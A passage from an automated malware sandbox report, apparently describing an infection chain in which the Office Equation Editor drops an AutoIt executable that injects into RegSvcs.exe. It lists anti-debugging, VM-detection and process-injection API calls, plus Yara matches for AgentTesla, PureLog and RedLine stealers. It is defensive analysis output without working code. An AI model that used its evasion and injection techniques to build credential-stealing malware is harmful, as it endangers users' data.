                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004231C8 push eax; ret 4_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E21D push ecx; ret 4_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C6BE push ebx; ret 4_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00273725 push ss; ret 4_2_00273729
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00274316 pushfd ; iretd 4_2_00274319
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CKK.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00E5F98E
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ED1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00ED1C41
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590242 rdtsc 2_2_03590242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Roaming\CKK.exeAPI coverage: 4.5 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2008Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00EADBBE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E7C2A2 FindFirstFileExW,3_2_00E7C2A2
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB68EE FindFirstFileW,FindClose,3_2_00EB68EE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00EB698F
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00EAD076
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00EAD3A9
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00EB9642
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00EB979D
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00EB9B2B
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB5C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00EB5C97
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00E442DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-7738
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-6739
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-6786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590242 rdtsc 2_2_03590242
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBEAA2 BlockInput,3_2_00EBEAA2
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E72622
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00E442DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035905E4 mov edx, dword ptr fs:[00000030h]2_2_035905E4
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E64CE8 mov eax, dword ptr fs:[00000030h]3_2_00E64CE8
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_001134D0 mov eax, dword ptr fs:[00000030h]3_2_001134D0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00113530 mov eax, dword ptr fs:[00000030h]3_2_00113530
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00111ED0 mov eax, dword ptr fs:[00000030h]3_2_00111ED0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00EA0B62
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E609D5 SetUnhandledExceptionFilter,3_2_00E609D5
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E72622
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E6083F
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00E60C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Roaming\CKK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00EA1201
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E82BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00E82BA5
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAB226 SendInput,keybd_event,3_2_00EAB226
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EC22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,3_2_00EC22DA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00EA0B62
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00EA1663
                  Source: CKK.exe, 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp, CKK.exe.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: CKK.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E60698 cpuid 3_2_00E60698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,4_2_00417A20
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E7333F GetSystemTimeAsFileTime,3_2_00E7333F
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E9D27A GetUserNameW,3_2_00E9D27A
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E7B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,3_2_00E7B952
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00E442DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1128, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected RedLine Stealer
